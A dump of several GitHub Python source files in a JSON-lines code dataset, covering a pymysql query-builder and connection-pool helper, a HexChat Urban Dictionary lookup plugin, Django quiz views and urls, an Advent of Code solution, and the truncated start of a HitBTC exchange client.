List[str], str] = None, ignore=False, on_duplicate_key_update: str = None):\n \"\"\"\n columns 为 可迭代对象 list/tuple/set/...\n 插入单条数据,condition为字典形式的数据\n data 必须为字典 或者 为一个元素类型为字典的列表\n \"\"\"\n sql = 'INSERT INTO `{}` ({}) VALUES ({})' if not ignore else 'INSERT IGNORE INTO {} ({}) VALUES ({})'\n if on_duplicate_key_update:\n sql += (\" on duplicate key update \"+on_duplicate_key_update)\n return cls._get_after_format_sql(sql, table, data, columns)\n\n @classmethod\n def generate_replace_into_sql(cls, table, data: dict or List[dict], columns: Union[Tuple[str], List[str], str] = None):\n \"\"\"\n columns 字段顺序。如果不传入,则���第一个data的 键集合\n \"\"\"\n sql = 'REPLACE INTO `{}` ({}) VALUES ({}) '\n return cls._get_after_format_sql(sql, table, data, columns)\n\n @classmethod\n def generate_update_sql_by_primary(cls, table, data: dict or List[dict], pri_value, columns: Union[Tuple[str], List[str], str] = None, primary: str = 'id'):\n \"\"\"\n 更新单条数据,condition为字典形式的数据\n columns 为 可迭代对象 list/tuple/set/...\n \"\"\"\n sql = 'UPDATE `{}` SET {} WHERE `{}`=%s'\n if isinstance(columns, str):\n columns = (columns,)\n else:\n if not columns:\n columns = data.keys()\n\n param = tuple(data[k] for k in columns)\n columns_condi = ','.join(['`' + k + '`' + '=%s' for k in columns])\n\n sql = sql.format(table, columns_condi, primary)\n param += (pri_value,)\n return sql, param\n\n @classmethod\n def generate_where_sql(cls, condition):\n assert isinstance(condition, (str, dict)), \"构造where条件的参数必须为字符串或 字典\"\n where_tags = []\n condition_param = []\n if isinstance(condition, str):\n where_tags = condition\n else:\n for key, value in condition.items():\n if isinstance(value, tuple) and len(value) == 2: # 大于小于\n where_tags.append('( `{}` >=%s and `{}` <=%s )'.format(key, key))\n condition_param.extend([value[0], value[1]])\n elif isinstance(value, list):\n if not value:\n continue\n where_tags.append(' `{}` in ({}) '.format(key, ','.join(['%s'] * len(value))))\n condition_param.extend(value)\n elif isinstance(value, Like):\n where_tags.append(\" `{}` like '{}' \".format(key, value))\n else:\n where_tags.append(' `{}`= %s'.format(key))\n condition_param.append(value)\n\n where_tags = ' AND '.join(where_tags)\n return where_tags, tuple(condition_param)\n\n @classmethod\n def generate_update_sql(cls, table, data: dict, where: str or dict , columns: Union[Tuple[str], List[str], str] = None, limit=None):\n \"\"\"\n @data:新数据 例如 data= {'name':'jack', 'age':18,'school':'MIT' } --> update xx set name='jack',age=18,school='MIT' \n @where 为dict时,会根据这个dict 转换为对应的where条件。 如传入 {'age':24} ---> update xx set name='jack',age=18,school='MIT' where age=24\n --> str : age=88 update xx set name='jack',age=18,school='MIT' where age=88\n 更新必须传入条件,避免漏传条件导致全表被更新\n \"\"\"\n sql = 'UPDATE `{}` SET {} WHERE {}'\n if isinstance(columns, str):\n columns = (columns,)\n if not columns:\n columns = data.keys()\n set_tags = ','.join(('`{}`=%s'.format(col, col) for col in columns))\n param = tuple(data[k] for k in columns)\n where_tags, where_param = cls.generate_where_sql(where)\n param += where_param\n if limit:\n param += (limit,)\n sql += ' limit %s'\n final_sql = sql.format(table, set_tags, where_tags)\n return final_sql, param\n\n @classmethod\n def generate_delete_sql(cls, table, where: str or dict, limit: int = None):\n sql = \"DELETE FROM `{}` WHERE {} \"\n where_tags, where_param = cls.generate_where_sql(where)\n sql = sql.format(table, where_tags)\n if limit:\n sql += \"limit {}\".format(limit)\n return sql, where_param\n\n\nclass 
MysqlSqler(SqlGenerator):\n\n def generate_merge_sql(self, table, data: dict or List[dict], columns: Union[Tuple[str], List[str], str] = None, merge_columns: Union[Tuple[str], List[str], str] = None):\n \"\"\"\n columns 为需要插入的字段\n merge_columns 为 出现重复时需要更新的字段.如果不给值,将会把所有 columns 里的字段都更新\n 如果columns 都没有值,将会读取所有data的 键值对\n \"\"\"\n if isinstance(columns, str):\n columns = (columns,)\n if not columns:\n columns = data.keys() if isinstance(data, dict) else data[0].keys()\n\n format_tags = ','.join(('%({})s'.format(col) for col in columns))\n if isinstance(merge_columns, str):\n merge_columns = (merge_columns,)\n if not merge_columns:\n merge_columns = columns\n update_str = ','.join(['`{}`=values(`{}`)'.format(col, col) for col in merge_columns])\n sql = \"INSERT INTO `{}` ({}) values({}) on duplicate key update {};\"\n return sql.format(table, '`'+'`,`'.join(columns)+'`', format_tags, update_str), data\n\n\nclass _SimpleConnector(SqlGenerator):\n\n logger = logger\n charset = 'utf8'\n cursor_class = DefaultCursor\n _primary_key_cache = dict() # 用来缓存表的主键\n\n def _set_conn_var(self, **kwargs):\n if kwargs.get('conn_cmd', None):\n connargs = self.get_conn_args_from_str(kwargs['conn_cmd'])\n del kwargs['conn_cmd']\n else:\n connargs = {'user': 'root', 'port': 3306, 'charset': self.charset}\n connargs.update(kwargs)\n\n connargs['port'] = int(connargs['port'])\n self.host = connargs['host']\n self.user = connargs['user']\n self.port = int(connargs['port'])\n self.password = connargs['password']\n self.charset = connargs.get('charset', 'utf8')\n db = connargs.get('db', None)\n self.database = db if db else connargs['database']\n return connargs\n\n def _choose_cursor_class(self, connargs: dict):\n \"\"\"\n 选择实例化连接时 选择的游标类型。 也可以在执行语句时自行选择。\n \"\"\"\n cursor_class = DefaultCursor\n if 'cursorclass' in connargs.keys():\n cursor_class = connargs['cursorclass']\n else:\n if 'cursor_type' in connargs.keys():\n cursor_type = connargs.get('cursor_type', None)\n del connargs['cursor_type']\n assert isinstance(cursor_type, str), \"cursor_type must in (ss,dcit,ssdict) \"\n cursor_type = cursor_type.lower()\n if cursor_type == 'ss':\n cursor_class = SSCursor\n elif cursor_type == 'dict':\n cursor_class = DictCursor\n elif cursor_type == 'ssdict':\n cursor_class = SSDictCursor\n connargs['cursorclass'] = cursor_class\n self.cursor_class = cursor_class\n return connargs\n\n def __init__(self, **kwargs):\n connargs = self._set_conn_var(**kwargs)\n self.connargs = self._choose_cursor_class(connargs)\n self.connector = pymysql.connect(**connargs)\n\n def get_conn_args_from_str(self, string):\n \"\"\"\n @string : mysql-client命令 mysql -h127.0.0.1 -p1234 -uroot -p123456 -Dtest_base \n 返回 参数字典 { \"host\":\"127.0.0.1\",\"port\":1234,\"password\":\"123456\",\"db\":\"test_base\" }\n \"\"\"\n conn_args = dict()\n patter_dict = {\n \"host\": \"-h\\s*?([\\d\\.]+)\",\n \"port\": \"-P\\s*?(\\d+)\",\n \"user\": \"-u\\s*?(\\S+)\",\n \"password\": \"-p\\s*?(\\S+)\",\n \"database\": \"-D\\s*?(\\S+)\",\n }\n for k, v in patter_dict.items():\n result = re.findall(v, string)\n number = len(result)\n if number == 1:\n conn_args[k] = result[0]\n else:\n if k == 'port':\n conn_args[k] = 3306\n elif k == 'user':\n conn_args[k] = 'root'\n elif k == 'host':\n conn_args[k] = 'localhost'\n else:\n raise ValueError(\"解析连接命令失败,确认命令符合 mysql -uxxx -Pxxxx -pxxxx -hxxxx -Dxxxx 格式 \")\n\n return conn_args\n\n def _get_connection(self):\n return self.connector\n\n def _get_cursor(self, connnetion, cursor_type=None):\n if not cursor_type:\n return 
connnetion.cursor(self.cursor_class)\n if cursor_type == 'dict':\n return connnetion.cursor(DictCursor)\n elif cursor_type == 'ss':\n return connnetion.cursor(SSCursor)\n elif cursor_type == 'ssdict':\n return connnetion.cursor(SSDictCursor)\n return connnetion.cursor(DefaultCursor) # default\n\n def read_ss_result(self, sql, param: Union[tuple, dict, List[tuple], List[dict]] = None, cursor_type: str = 'ss'):\n \"\"\"\n 读取流式游标的结果\n \"\"\"\n conn = self._get_connection()\n assert cursor_type.lower() in ('ss', 'ssdict'), \"此处只支持流式游标 ss或ssdict\"\n cursor = self._get_cursor(conn, cursor_type)\n try:\n count = cursor.executemany(sql, param) if isinstance(param, list) else cursor.execute(sql, param)\n # conn.commit()\n result = cursor.fetchone()\n while result is not None:\n yield result\n result = cursor.fetchone()\n cursor.close()\n except Exception as e:\n conn.rollback()\n traceback.print_exc()\n return OperationError(e)\n\n def execute_sql(self, sql: str, param: Union[tuple, dict, List[tuple], List[dict]] = None, cursor_type: str = None):\n \"\"\"\n 核心方法,执行sql\n # cursor_type为游标类型(默认返回值为元祖类型),可选字典游标,将返回数据的字典形式\n # 此方法应直接返回 所有结果,不应去考虑fetchone还是fetchmany的问题。这是传入的sql中就应该限定的\n 注意此方法 返回两个值\n 如果参数是列表类型,则使��executemany方法 \n \"\"\"\n conn = self._get_connection()\n cursor = self._get_cursor(conn, cursor_type)\n result = count = False\n try:\n count = cursor.executemany(sql, param) if isinstance(param, list) else cursor.execute(sql, param) # 得到受影响的数据条数\n conn.commit()\n result = cursor.fetchall() # 此方法应直接返回 所有结果,不应去考虑fetchone还是fetchmany的问题。这是传入的sql中就应该限定的\n except Exception as e:\n self.logger.warning(\"---------------------------------\")\n self.logger.error(str(e))\n self.logger.error(sql)\n # self.logger.error(param) #参数太长了,不要打印\n self.logger.error(traceback.format_exc())\n self.logger.info(\"---------------------------------\")\n conn.rollback()\n result = count = OperationError(e)\n finally:\n return result, count\n\n def execute_with_return_id(self, sql: str, param: Union[tuple, dict, List[tuple], List[dict]] = None):\n \"\"\"\n 此方法会返回插入的最后一行的id\n \"\"\"\n conn = self._get_connection()\n cursor = self._get_cursor(conn)\n result = False\n try:\n r = cursor.executemany(sql, param) if isinstance(param, list) else cursor.execute(sql, param)\n cursor.execute(\"SELECT LAST_INSERT_ID() AS id\")\n result = cursor.fetchall()[0][0]\n conn.commit()\n except Exception as e:\n self.logger.info(\"---------------------------------\")\n self.logger.error(sql)\n # self.logger.error(param)\n self.logger.info(\"---------------------------------\")\n conn.rollback()\n traceback.print_exc()\n result = OperationError(e)\n finally:\n return result\n\n def do_transaction(self, sql_params: List[Tuple[str, tuple]], cursor_type: str = None):\n \"\"\"\n 执行事务:传入sql和params 列表 ,如下\n [ \n ( 'insert into a (`id`) values(%s)', (1,) ),\n ('update a set `id`= %s' where `id`=%s', (2,3) ) \n ]\n sql_params 内的元素类型为 tuple 对应 ---> (sql,params) , 其中 如果params 类型为list,则会使用启用游标的executemany 去执行\n 返回最后一条sql的执行结果\n \"\"\"\n conn = self._get_connection()\n cursor = self._get_cursor(conn, cursor_type=cursor_type)\n result = count = False\n try:\n for sql, param in sql_params:\n count = cursor.executemany(sql, param) if isinstance(param, list) else cursor.execute(sql, param)\n result = cursor.fetchall()\n conn.commit()\n except Exception as e:\n conn.rollback()\n traceback.print_exc()\n result = count = OperationError(e)\n finally:\n return result, count\n\n def select(self, columns: Union[Tuple[str], List[str], str] , table: str , where: str 
or dict = None,\n group_by: str = None, order_by: str = None, limit: int = None, offset: int = None, **kwargs):\n \"\"\"\n 仅支持 简单的查询\n \"\"\"\n sql, param = self.generate_select_sql(columns, table, where, group_by, order_by, limit, offset)\n return self.execute_sql(sql, param, **kwargs)[0]\n\n def insert_into(self, table: str, data: dict or List[dict], columns: Union[Tuple[str], List[str], str] = None, ignore=False, on_duplicate_key_update: str = None, return_id=False, **kwargs):\n \"\"\"\n @data: 字典或字典列表(批量插入) \n @columns: 哪些字段需要被插入。默认是传入的data的所有键。当data中有多余字段时,可以通过columns指定哪些字段需要作为新数据的字段插入\n @ignore: 是否 insert ignore into \n @on_duplicate_key_update:出现 重复时的处理 ,如 插入一条数据出现重复时,令name字段等于“重复“ 则传入 on_duplicate_key_update= ”name='重复'“ 即可\n @return_id: True ->返回最后一条插入语句的id ,默认False 返回受影响的条数\n \"\"\"\n sql, param = self.generate_insert_sql(table, data, columns, ignore, on_duplicate_key_update)\n return self.execute_with_return_id(sql, param, **kwargs) if return_id else self.execute_sql(sql, param, **kwargs)[1]\n\n def replace_into(self, table: str, data: dict or list, columns: Union[Tuple[str], List[str], str] = None, **kwargs):\n \"\"\"\n 将传入的字典或字典列表 replcae into \n 返回受影响的行数\n @columns: 限定影响的字段\n \"\"\"\n sql, param = self.generate_replace_into_sql(table, data, columns)\n return self.execute_sql(sql, param, **kwargs)[1]\n\n def update_by_primary(self, table: str, data: dict, pri_value, columns=None, cache=True, **kwargs):\n \"\"\"\n 通过主键去更新\n @pri_value :主键的值\n @data: 更新的目标值。传入的字典将会转化为 update xxx set key=value,key2=value2 的 形式\n @cache: 是否缓存表的主键,避免频繁查询表的主键\n @columns: 限定影响的字段\n 返回受影响的条数(这里正常只会返回 1或0)\n \"\"\"\n primary = self._get_primary_key(table, cache)\n sql, param = self.generate_update_sql_by_primary(table, data, pri_value, columns, primary)\n return self.execute_sql(sql, param, **kwargs)[1]\n\n def update(self, table: str, data: dict, where: Union[dict, str], columns: Union[Tuple[str], List[str], str] = None, limit: int = None, **kwargs):\n \"\"\"\n @data: 要被更新的数据,传入字典将会转化为 update xxx set key=value,key2=value2 的 形式\n @columns: 限定被影响的字段。默认为空,即不限定。则传入的data字典的所有键值对都会被映射为字段和值。\n @where: where 条件,使用该条件去找出哪些数据要被更新。\n 如果where 为 字典,则根据字典映射成 where key=value\n 如果是str,则直接将改该字符串拼接到 where 关键字之后\n 如果是 可迭代对象,则会将该对象中的所有元素key对应的 data[key] 取出,作为where条件的映射。\n 例如 data={\"name\":\"jack\",\"age\":18,\"gender\":0} ,where =[\"name\",] ,columns=[\"age\",\"gender\"] \n --> update xx set `age`=18,`gender`=0 where `name`=\"jack\"\n \"\"\"\n sql, param = self.generate_update_sql(table, data, where, columns, limit)\n return self.execute_sql(sql, param, **kwargs)[1]\n\n def delete_by_primary(self, table: str, pri_value, cache=True, **kwargs):\n \"\"\"\n 通过主键删除数据,这里要先查出主键,不允许指定,即使大部分场景下主键是id。\n @pri_value :主键的值\n @cache: 是否缓存表的主键,避免频繁查询表的主键\n 返回受影响的条数(这里正常只会返回 1或0)\n \"\"\"\n primary = self._get_primary_key(table, cache)\n sql = \"DELETE FROM {} WHERE `{}`=%s \".format(table, primary)\n return self.execute_sql(sql, (pri_value,),**kwargs)[1]\n\n def _get_primary_key(self, table: str, cache=True):\n \"\"\"\n 获取表的主键\n @cache: 是否缓存该表的主键\n \"\"\"\n primary = None\n if cache:\n primary = self._primary_key_cache.get(table, None)\n if not primary:\n sql = \"SELECT column_name FROM INFORMATION_SCHEMA.`KEY_COLUMN_USAGE` WHERE table_name='{}' AND constraint_name='PRIMARY'\".format(table)\n result = self.execute_sql(sql, cursor_type='default')\n primary = result[0][0][0]\n if cache:\n self._primary_key_cache[table] = primary\n return primary\n\n def delete(self, table: str, where: str or dict, limit: int = None, **kwargs):\n 
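# note: the where-condition has no default here, so a forgotten argument cannot silently wipe the whole table\n 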
\"\"\"\n 根据传入的条件 删除对应的数据\n 必须传入条件,避免因为漏参数而删除整个表。\n 返回受影响的条数 \n \"\"\"\n sql, param = self.generate_delete_sql(table, where, limit, **kwargs)\n return self.execute_sql(sql, param, **kwargs)[1]\n\n def get_multiqueries(self, sql: str or list, params: Union[tuple, dict, List[tuple], List[dict]] = None, cursor_type=None):\n \"\"\"\n 同时执行多个sql ,一次性返回所有结果集.但是需要在初始化连接时,引入CLIENT.MULTI_STATEMENTS 作为连接参数实例化连接\n from pymysql.constants import CLIENT\n client_flag=CLIENT.MULTI_STATEMENTS\n connargs={\"client_flag\":client_flag}\n conn=MysqlConnection(**connargs)\n @sql: 以分号; 进行连接的多条语句 或 sql 列表\n @params: sql对应的参数列表\n @cursor_type : 游标类型\n \"\"\"\n assert self.connargs.get('client_flag', None) == CLIENT.MULTI_STATEMENTS, \"使用该方法必须在实例化连接时引入client_flag参数。参考:https://blog.csdn.net/qq_33634196/article/details/119883045\"\n conn = self._get_connection()\n if isinstance(sql, list):\n sql = ';'.join(sql)\n if isinstance(cursor_type, str):\n assert cursor_type.lower() in ('default', 'dict', None), \"仅支持默认游标(default)和字典游标(dict)\"\n cursor = self._get_cursor(conn, cursor_type=cursor_type) # 此处由于需要返回查询结果集,所以不支持流式游标\n try:\n cursor.execute(sql, params)\n results = []\n results.append(cursor.fetchall())\n while cursor.nextset():\n results.append(cursor.fetchall())\n conn.commit() # 这个要在最后进行提交\n return results\n except Exception as e:\n cursor.close()\n conn.rollback()\n traceback.print_exc()\n return OperationError(e)\n\n\nclass MysqlConnection(MysqlSqler, _SimpleConnector):\n\n charset = \"utf8mb4\"\n\n def merge_into(self, table: str, data: dict or List[dict], columns: Union[Tuple[str], List[str], str] = None, merge_columns: Union[Tuple[str], List[str], str] = None, **kwargs):\n \"\"\"\n 合并数据。mysql 不支持原生的merge into。这里通过 insert into ... on duplicate key update ...来实现\n @data:需要被合并的数据\n @columns:限定被影响的字段。默认是传入的data中的所有字段被会被影响\n @merge_columns:产生重复时,需要被更新的字段,默认是全部受影响的字段都被覆盖\n 返回受影响的条数\n \"\"\"\n sql, param = self.generate_merge_sql(table, data, columns, merge_columns, **kwargs)\n return self.execute_sql(sql, param, **kwargs)[1]\n\n @property\n def tables(self):\n if hasattr(self, '_tables'):\n return self._tables\n all_tables, _ = self.execute_sql(\"show tables\")\n setattr(self, '_tables', tuple(d[0] for d in all_tables))\n return self._tables\n\n\nclass _SimplePoolConnector(object):\n _creator = None\n\n def _init_connargs(self, **kwargs):\n args_dict = self._set_conn_var(**kwargs)\n # 默认参数,参照 sqlalchemy 的连接池参数,进行初始化配置,(除了 SET AUTOCOMMIT = 1 之外,因为这个类的事务都是底层手动提交的,只是看起来和自动提交一样)\n # 1 20 0 0 False None ['SET AUTOCOMMIT = 1'] True None 1\n connargs = {\"host\": self.host, \"user\": self.user, \"password\": self.password, \"database\": self.database, 'port': self.port, \"charset\": self.charset,\n \"creator\": self._creator, \"mincached\": 1, \"maxcached\": 20, \"blocking\": False}\n\n # mincached : 启动时开启的空连接数量(0代表开始时不创建连接)\n # maxcached : 连接池最大可共享连接数量(0代表不闲置连接池大小)\n # maxshared : 共享连接数允许的最大数量(0代表所有连接都是专用的)如果达到了最大数量,被请求为共享的连接将会被共享使用\n # maxconnecyions : 创建连接池的最大数量(0代表不限制)\n # blocking : 达到最大数量时是否阻塞(0或False代表返回一个错误; 其他代表阻塞直到连接数减少,连接被分配)\n # maxusage : 单个连接的最大允许复用次数(0或False代表不限制的复用).当达到最大数时,连接会自动重新连接(关闭和重新打开)\n # setsession : 用于传递到数据库的准备会话,如 [”set name UTF-8″]\n connargs.update(args_dict)\n return connargs\n\n def __init__(self, *args, **kwargs):\n self.connargs = self._init_connargs(*args, **kwargs)\n self.connection_pool = PooledDB(**self.connargs)\n\n def _get_connection(self):\n return self.connection_pool.connection()\n\n\nclass MysqlPool(_SimplePoolConnector, MysqlConnection):\n\n port = 3306\n _creator = pymysql\n\n 
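# pooled variant: _get_connection() (inherited from _SimplePoolConnector) checks a connection out of\n # the PooledDB pool on every call, instead of reusing the single pymysql connection of MysqlConnection\n 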
def __init__(self, **kwargs):\n connargs = self._init_connargs(**kwargs)\n self.connargs = self._choose_cursor_class(connargs)\n self.connection_pool = PooledDB(**self.connargs)","repo_name":"lishukan/directsql","sub_path":"directsql/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":27838,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"} +{"seq_id":"14115844637","text":"\" This is a module for xchat2 / hexchat \"\n# problem: any http request could take up to 30 seconds\n# but we can't block all of hexchat to wait\n# AND 'threading' module will sometimes crash ALL of hexchat\n# (may be a persistent bug in Gtk_object)\n# when trying to modify gtk objects from a child thread\n# \"don't update gtk ui directly from any thread\"\n# TODO: hexchat uses Python 3.5, try using 'asyncio' module instead?\nimport hexchat\nimport json\nimport re\nfrom threading import Thread\nimport time\nimport urllib.request\n\n# -- config\n# time in seconds between saying stuff out-loud\nTIMEOUT = 5\n\n# channels to listen for the '`ud' trigger\nLISTEN_TO = '#farts #wetfish #test'\n\n# I forget where I learned this URL. it's valid but undocumented\nUD_API = 'http://api.urbandictionary.com/v0/define?page=0&term={}'\n\n\n# -- init\n__module_name__ = \"urbandict\"\n__module_version__ = \"20170701\"\n__module_description__ = \"urban dictionary lookups\"\n__module_author__ = \"Mozai \"\n\n\n# IRC colours as per mIRC:\n# \\x0301 black \\x0302 blue \\x0302,01 blue-on-black \\x0f normal\n# \\x02 bold \\x02 un-bold \\x0f normal\n\n# my god this is ugly; I'm depending on side-effects\n# the alternative is to use context.command() from inside a child thread\n# which will crash all of hexchat :(\n\nCHANNELS = {i: {'req': False, 'resp': False, 'wait': 0} for i in LISTEN_TO.split()}\n\ndef _drone(userdata):\n \" given an entry in dict CHANNELS, populates the 'resp' key \"\n if userdata.get('req') is None:\n return None\n if userdata.get('resp') is not None:\n return userdata['resp']\n answer = None\n try:\n conn = urllib.request.urlopen(UD_API.format(userdata.get('param')))\n i = conn.read().decode('utf-8')\n j = json.loads(i)\n if j.get('list'):\n answer = j['list'][0]['definition']\n answer = re.sub(r'\\s+', ' ', answer)\n if len(answer) > 200:\n answer = answer[:195] + ' ...'\n except Exception as err:\n pass # TODO: how to report error without talking to GTK ui elements?\n finally:\n userdata['req'] = None\n userdata['resp'] = answer\n return answer\n\n\ndef _emit_definition(userdata):\n \" (thread) fetch urbandict definition, emit it\"\n # if using .hook_timer(), returning 'True' will re-hook_timer() this\n now = int(time.time())\n if userdata['conch']:\n # we're already running\n return False\n if now <= userdata['wait']:\n # TODO: maybe tell user to wait\n return False\n context = userdata.get('context')\n param = userdata.get('param')\n try:\n userdata['conch'] = True\n conn = urllib.request.urlopen(UD_API.format(param))\n i = conn.read().decode('utf-8')\n j = json.loads(i)\n defined = ''\n if j.get('list'):\n defined = j['list'][0]['definition']\n defined = re.sub(r'\\s+', ' ', defined)\n if len(defined) > 200:\n defined = defined[:195] + ' ...'\n except Exception as err:\n userdata['conch'] = False\n raise\n if context:\n if defined:\n context.command('me \\x02urbdict:\\x02 \"{}\"'.format(defined))\n userdata['wait'] = now + TIMEOUT\n else:\n context.command('me \\x02urbdict:\\x02 \"{}\" not found'.format(param))\n userdata['wait'] = now + 1\n else:\n if 
defined:\n print('\\x02UD says:\\x02 \"{}\"'.format(defined))\n else:\n print('\\x02UD:\\x02 term \"{}\" not found'.format(param))\n userdata['context'] = None\n userdata['param'] = None\n userdata['conch'] = False\n return False # don't keep repeating the .hook_timer()\n\n\ndef ud_listening(word, word_eol, userdata):\n del(userdata) # shut up pylint\n context = hexchat.get_context()\n chan = context.get_info('channel')\n userdata = CHANNELS.get(chan)\n if userdata is None:\n return None\n useful = word[1].split(None, 1)\n # \"!ud argle bargle\" -> [\"!ud\", \"argle bargle\"]\n # \"!ud\" -> [\"!ud\"]\n if len(useful) == 2 and useful[0] in ('!ud', '`ud'):\n userdata['context'] = context\n userdata['param'] = useful[1]\n # tried using .hook_timer() because threading is causing crashes\n #userdata['hook'] = hexchat.hook_timer(10, _emit_definition, userdata)\n drone = Thread(target=_emit_definition, args=(userdata,))\n drone.daemon = True\n drone.start()\n\n return hexchat.EAT_PLUGIN\n\n\ndef ud_command(word, word_eol, userdata):\n del(userdata) # shut up pylint\n term = word_eol[1]\n if not term:\n print(\"{} term : go fetch the first UrbanDictionary definition of term\".format(word[0]))\n else:\n userdata = {'conch': False, 'context': None, 'param': term, 'wait': 0}\n userdata['hook'] = hexchat.hook_timer(100, _emit_definition, userdata)\n\n\nhexchat.hook_print('Channel Message', ud_listening)\n# hexchat.hook_server('PRIVMSG', ud_listening)\nhexchat.hook_print('Your Message', ud_listening)\nhexchat.hook_command('ud', ud_command, help='go fetch the first UrbanDictionary definition of param')\nprint(\"urbdict loaded (!ud term, `ud term, /ud term)\")\n","repo_name":"mozai/xchat-scripts","sub_path":"urbdict_xchat.py","file_name":"urbdict_xchat.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"35022226038","text":"from django.urls import path\nfrom . 
import views\n\napp_name=\"admissions\"\nurlpatterns = [\n path('', views.index, name='index'),\n path('application/', views.application, name=\"application\"),\n path('application/success/', views.application_success, name=\"application-success\"),\n path('applicants/', views.applicants, name=\"applicants\"),\n path('applicant//', views.view_applicant, name=\"view-applicant\"),\n path('applicant//', views.handle_applicant, name=\"handle-applicant\"),\n path('my-application/', views.my_application, name=\"my-application\")\n]\n","repo_name":"SIS101/SIS101","sub_path":"sis/admissions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"20609639301","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.http import Http404\n\nfrom skil.models import Equestion, Nquestion, Epercent, Npercent\n\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n# Create your views here.\ndef index(request):\n return render(request, 'skil/index.html')\n\ndef esele(request):\n return render(request, 'skil/esele.html')\n\ndef nsele(request):\n return render(request, 'skil/nsele.html')\n\ndef exceltest(request, excel_id):\n if request.method == 'GET':\n excel = Equestion.objects.filter(id__gte=10*excel_id-9).filter(id__lt=10*excel_id+1)\n data = {'excel':excel}\n return render(request, 'skil/excel_test.html', data)\n elif request.method == 'POST':\n op_lst=['option0','option1','option2','option3','option4','option5','option6','option7','option8','option9']\n ans_lst=[]\n your_ans=[]\n xs=[0,1,2,3,4,5,6,7,8,9]\n #ans = request.POST.get(\"option0\")\n excel = Equestion.objects.filter(id__gte=10*excel_id-9).filter(id__lt=10*excel_id+1)\n excela = list(excel.values())\n lst=[]\n for ex in excela:\n lst.append(ex[\"answer\"])\n for op in op_lst:\n ans = request.POST.get(op)\n your_ans.append(ans)\n for n in range(10):\n exc=Epercent.objects.get(pk=10*(excel_id-1)+n+1)\n if your_ans[n] == lst[n]:\n ans_lst.append('正解')\n exc.true += 1\n exc.save()\n else:\n ans_lst.append('不正解')\n exc.false += 1\n exc.save()\n exc.percent = (exc.true/(exc.true+exc.false))\n exc.save()\n return render(request, 'skil/Eanswer.html', {'yans':your_ans, 'ans':ans_lst, 'excel':excela, 'xs':xs})\n \n\ndef nettest(request, net_id):\n if request.method == 'GET':\n net = Nquestion.objects.filter(id__gte=10*net_id-9).filter(id__lt=10*net_id+1)\n data = {'net':net}\n return render(request, 'skil/net_test.html', data)\n elif request.method == 'POST':\n op_lst=['option0','option1','option2','option3','option4','option5','option6','option7','option8','option9']\n ans_lst=[]\n your_ans=[]\n #ans = request.POST.get(\"option0\")\n net = Nquestion.objects.filter(id__gte=10*net_id-9).filter(id__lt=10*net_id+1)\n neta = list(net.values())\n lst=[]\n for nt in neta:\n lst.append(nt[\"answer\"])\n for op in op_lst:\n ans = request.POST.get(op)\n your_ans.append(ans)\n for n in range(10):\n if your_ans[n] == lst[n]:\n ans_lst.append('正解') \n else:\n ans_lst.append('不正解')\n return render(request, 'skil/Nanswer.html', {'yans':your_ans, 'ans':ans_lst, 'net':neta})\n\ndef Eanswer(request, excel_id):\n #if request.method == 'GET':\n excel = Equestion.objects.filter(id__gte=10*excel_id-9).filter(id__lt=10*excel_id+1)\n data = {'excel':excel}\n return render(request, 'skil/Eanswer.html', data)\n\ndef Nanswer(request, net_id):\n net = 
Nquestion.objects.filter(id__gte=10*net_id-9).filter(id__lt=10*net_id+1)\n data = {'net':net}\n return render(request, 'skil/Nanswer.html', data)\n\ndef epercent(request):\n excels = Equestion.objects.all()\n paginator = Paginator(excels, 10) # show 10 items per page\n p = request.GET.get('p') # get the current page number from the URL parameter\n excel = paginator.get_page(p) # get the Articles for the specified page\n\n per=Epercent.objects.all()\n paginator = Paginator(per, 10)\n percent = paginator.get_page(p)\n return render(request, 'skil/epercent.html', {'excel': excel, 'p': p, 'percent':percent})\n \ndef npercent(request):\n nets = Nquestion.objects.all()\n paginator = Paginator(nets, 10) # show 10 items per page\n p = request.GET.get('p') # get the current page number from the URL parameter\n net = paginator.get_page(p) # get the Articles for the specified page\n\n per=Npercent.objects.all()\n paginator = Paginator(per, 10)\n percent = paginator.get_page(p)\n return render(request, 'skil/npercent.html', {'net': net, 'p': p, 'percent':percent})","repo_name":"IsshuTomizawa/skilltest","sub_path":"skil/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
{"seq_id":"37834604994","text":"import argparse\nimport os\n\n\ndef main():\n day = os.path.basename(__file__).split('-')[0]\n challenge_input = '{}-input.txt'.format(day)\n # challenge_input = '{}-example.txt'.format(day)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--input', default=challenge_input)\n args = parser.parse_args()\n\n lines = []\n with open(args.input, 'r') as infile:\n for line in infile:\n lines.append(line.strip())\n\n line = lines[0]\n up = line.count('(')\n down = line.count(')')\n print('{} + {} = {}'.format(up, down, up - down))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JBailyes/advent-of-code","sub_path":"2015/01-1.py","file_name":"01-1.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
{"seq_id":"13371890251","text":"from crypto.engine import Exchange\nimport requests\nfrom crypto.structs import Order, Trade, Market, Ticker, Balance, OrderBook, Entry, Candle\nimport dateutil.parser\nfrom crypto.hitbtc.mock import mock_adapter\nimport logging\nimport configparser\nfrom crypto.helpers import print_json\nimport datetime\n\n\nclass HitBTCExchange(Exchange):\n def __init__(self, base_url, key, secret, symbols, mock=True):\n super().__init__(base_url, key, secret, symbols, mock)\n self.session = requests.session()\n if mock:\n self.session.mount('mock', mock_adapter)\n self.session.auth = (self.key, self.secret)\n self.symbols = symbols if not mock else ['ETHBTC', 'LTCBTC', 'ETCBTC']\n self.markets = {}\n self.markets = {s: self.to_market(s) for s in symbols}\n\n # Interface\n def bid(self, market, rate, quantity):\n try:\n status, data = self._order_create(market.symbol, side=\"buy\", price=rate, quantity=quantity)\n if status == 200:\n return self._to_order(data)\n else:\n raise 